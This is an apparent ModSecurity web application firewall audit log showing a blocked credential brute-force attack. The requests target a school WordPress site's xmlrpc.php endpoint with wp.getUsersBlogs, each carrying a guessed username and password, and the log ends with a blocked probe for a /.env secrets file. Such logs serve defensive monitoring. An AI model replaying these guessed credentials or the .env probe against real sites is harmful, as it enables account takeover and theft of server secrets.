--181e7b76-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--181e7b76-E--
--181e7b76-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514508354771 5381 (- - -)
Stopwatch2: 1745514508354771 5381; combined=3834, p1=474, p2=3171, p3=0, p4=0, p5=109, sr=87, sw=80, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--181e7b76-Z--
--af5d3174-A--
[25/Apr/2025:00:09:28 +0700] aApwSPiVYlyO1xhz7yO41QAAAMk 103.236.140.4 43560 103.236.140.4 8181
--af5d3174-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--af5d3174-C--
wp.getUsersBlogs
kasubagtu
cowboys
--af5d3174-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af5d3174-E--
--af5d3174-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514568199097 5736 (- - -)
Stopwatch2: 1745514568199097 5736; combined=4117, p1=542, p2=3376, p3=0, p4=0, p5=115, sr=90, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af5d3174-Z--
--f8d11d7b-A--
[25/Apr/2025:00:10:28 +0700] aApwhPiVYlyO1xhz7yO5ZQAAAMg 103.236.140.4 46158 103.236.140.4 8181
--f8d11d7b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f8d11d7b-C--
wp.getUsersBlogs
administrator
password
--f8d11d7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f8d11d7b-E--
--f8d11d7b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514628203090 5085 (- - -)
Stopwatch2: 1745514628203090 5085; combined=3856, p1=452, p2=3207, p3=0, p4=0, p5=113, sr=89, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f8d11d7b-Z--
--d0263a49-A--
[25/Apr/2025:00:11:28 +0700] aApwwGLuk3f9kLjsdTaNRQAAAJU 103.236.140.4 48826 103.236.140.4 8181
--d0263a49-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 236
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d0263a49-C--
wp.getUsersBlogs
administrator
smkn22-jkt.sch.id
--d0263a49-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0263a49-E--
--d0263a49-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514688290830 5330 (- - -)
Stopwatch2: 1745514688290830 5330; combined=4188, p1=515, p2=3490, p3=0, p4=0, p5=108, sr=87, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0263a49-Z--
--8c205707-A--
[25/Apr/2025:00:12:28 +0700] aApw_GLuk3f9kLjsdTaNywAAAI0 103.236.140.4 51134 103.236.140.4 8181
--8c205707-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 242
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8c205707-C--
wp.getUsersBlogs
administrator
smkn22-jkt_sch_id123456
--8c205707-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c205707-E--
--8c205707-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514748335589 4936 (- - -)
Stopwatch2: 1745514748335589 4936; combined=3859, p1=445, p2=3226, p3=0, p4=0, p5=109, sr=90, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c205707-Z--
--fa921958-A--
[25/Apr/2025:00:13:28 +0700] aApxOGLuk3f9kLjsdTaOgQAAAIs 103.236.140.4 53642 103.236.140.4 8181
--fa921958-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fa921958-C--
wp.getUsersBlogs
administrator
tests
--fa921958-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa921958-E--
--fa921958-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (107+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514808000723 4839 (- - -)
Stopwatch2: 1745514808000723 4839; combined=3579, p1=431, p2=2945, p3=0, p4=0, p5=116, sr=89, sw=87, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa921958-Z--
--b565ad57-A--
[25/Apr/2025:00:14:28 +0700] aApxdMlQo524fhbIj1yR-gAAAAs 103.236.140.4 56128 103.236.140.4 8181
--b565ad57-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b565ad57-C--
wp.getUsersBlogs
administrator
admini
--b565ad57-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b565ad57-E--
--b565ad57-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514868329379 4872 (- - -)
Stopwatch2: 1745514868329379 4872; combined=3709, p1=408, p2=3115, p3=0, p4=0, p5=108, sr=86, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b565ad57-Z--
--eccf0233-A--
[25/Apr/2025:00:15:08 +0700] aApxnMlQo524fhbIj1ySggAAABc 103.236.140.4 57616 103.236.140.4 8181
--eccf0233-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--eccf0233-C--
wp.getUsersBlogs
administrator
1234%^&*
--eccf0233-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eccf0233-E--
--eccf0233-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514908395882 4931 (- - -)
Stopwatch2: 1745514908395882 4931; combined=3679, p1=448, p2=3040, p3=0, p4=0, p5=115, sr=87, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eccf0233-Z--
--ad320023-A--
[25/Apr/2025:00:15:28 +0700] aApxsPiVYlyO1xhz7yO9AQAAANc 103.236.140.4 58384 103.236.140.4 8181
--ad320023-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ad320023-C--
wp.getUsersBlogs
administrator
1234560
--ad320023-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ad320023-E--
--ad320023-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514928682845 4522 (- - -)
Stopwatch2: 1745514928682845 4522; combined=3385, p1=368, p2=2873, p3=0, p4=0, p5=85, sr=72, sw=59, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad320023-Z--
--a0f80a22-A--
[25/Apr/2025:00:16:28 +0700] aApx7GLuk3f9kLjsdTaQZwAAAIo 103.236.140.4 60508 103.236.140.4 8181
--a0f80a22-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a0f80a22-C--
wp.getUsersBlogs
administrator
brandon
--a0f80a22-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0f80a22-E--
--a0f80a22-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745514988277956 5399 (- - -)
Stopwatch2: 1745514988277956 5399; combined=4264, p1=517, p2=3562, p3=0, p4=0, p5=109, sr=109, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0f80a22-Z--
--c5eb2c2b-A--
[25/Apr/2025:00:17:28 +0700] aApyKMlQo524fhbIj1yU8gAAAA8 103.236.140.4 33976 103.236.140.4 8181
--c5eb2c2b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c5eb2c2b-C--
wp.getUsersBlogs
administrator
cowboys
--c5eb2c2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5eb2c2b-E--
--c5eb2c2b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (113+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515048541115 5326 (- - -)
Stopwatch2: 1745515048541115 5326; combined=3779, p1=470, p2=3139, p3=0, p4=0, p5=100, sr=86, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5eb2c2b-Z--
--ce80d17e-A--
[25/Apr/2025:00:18:28 +0700] aApyZN5yz20UX9VrdZPTVgAAAE0 103.236.140.4 35574 103.236.140.4 8181
--ce80d17e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ce80d17e-C--
wp.getUsersBlogs
administrator
shaggy
--ce80d17e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce80d17e-E--
--ce80d17e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515108223622 5316 (- - -)
Stopwatch2: 1745515108223622 5316; combined=3801, p1=447, p2=3174, p3=0, p4=0, p5=106, sr=86, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce80d17e-Z--
--035b7770-A--
[25/Apr/2025:00:19:28 +0700] aApyoN5yz20UX9VrdZPTmgAAAEw 103.236.140.4 37224 103.236.140.4 8181
--035b7770-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--035b7770-C--
wp.getUsersBlogs
kajur
admin@#7890
--035b7770-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--035b7770-E--
--035b7770-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515168359528 17283 (- - -)
Stopwatch2: 1745515168359528 17283; combined=27609, p1=418, p2=2943, p3=0, p4=0, p5=12139, sr=88, sw=85, l=0, gc=12024
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--035b7770-Z--
--af057303-A--
[25/Apr/2025:00:20:28 +0700] aApy3MlQo524fhbIj1yWcwAAABc 103.236.140.4 39146 103.236.140.4 8181
--af057303-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--af057303-C--
wp.getUsersBlogs
kajur
PASSWORD
--af057303-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af057303-E--
--af057303-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (129+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515228295860 4426 (- - -)
Stopwatch2: 1745515228295860 4426; combined=3245, p1=421, p2=2682, p3=0, p4=0, p5=84, sr=83, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af057303-Z--
--a6aceb0d-A--
[25/Apr/2025:00:21:28 +0700] aApzGPiVYlyO1xhz7yO_vQAAAME 103.236.140.4 41002 103.236.140.4 8181
--a6aceb0d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.120.74
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.120.74
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a6aceb0d-C--
wp.getUsersBlogs
kajur
789789
--a6aceb0d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6aceb0d-E--
--a6aceb0d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745515288052450 6057 (- - -)
Stopwatch2: 1745515288052450 6057; combined=4295, p1=485, p2=3625, p3=0, p4=0, p5=108, sr=91, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6aceb0d-Z--
--dfff8862-A--
[25/Apr/2025:00:21:30 +0700] aApzGviVYlyO1xhz7yO_xQAAAMY 103.236.140.4 41088 103.236.140.4 8181
--dfff8862-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 206.81.12.187
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 206.81.12.187
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--dfff8862-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dfff8862-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745515290507408 827 (- - -)
Stopwatch2: 1745515290507408 827; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dfff8862-Z--
--9f875364-A--
